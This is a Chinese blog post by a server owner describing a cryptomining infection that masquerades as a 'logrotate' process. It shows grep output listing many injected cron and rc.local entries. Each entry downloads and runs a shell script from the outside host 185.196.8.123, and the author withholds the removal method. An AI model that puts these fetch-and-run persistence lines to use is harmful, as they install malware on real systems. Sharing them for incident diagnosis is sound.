【已解决】挖矿病毒 logrotate 185.196.8.123

如果你最近也中了这个病毒,看这篇文章就对了。

网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了...

经过本人几天的尝试,最终找到了干掉他的方法。

 

先确定下你的症状是不是跟我一样?

问题现象:Shell登录慢,logrorateCPU占用高,这个进程的文件路径为:/root/.config/logrotate,删掉又重新生成。

 

使用find /etc | xargs grep -ri "185.196.8.123" 命令查了下,大概有以下文件被加入了恶意脚本:

各种级别的定时任务、系统登录、退出时执行

/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants: 没有那个文件或目录
grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants/qemu-guest-agent.service: 没有那个文件或目录
/etc/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
grep: /etc/alternatives/mta-mailqman: 没有那个文件或目录
grep: /etc/alternatives/mta-newaliasesman: 没有那个文件或目录
grep: /etc/alternatives/mta-sendmailman: 没有那个文件或目录
grep: /etc/alternatives/mta-aliasesman: 没有那个文件或目录
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)

 

解决思路:

正常解决思路无法清理掉,博主使用了一波骚操作来顺利清理掉。为了防止写此病毒脚本的人看到这篇文章来升级脚本,思路就不放出来了。需要的同学请留言,我来无偿发你

中病毒原因:我猜你大概率是开过8000端口😄

 

posted @ 2024-07-08 12:25  阿狸哥哥  阅读(319)  评论(5编辑  收藏  举报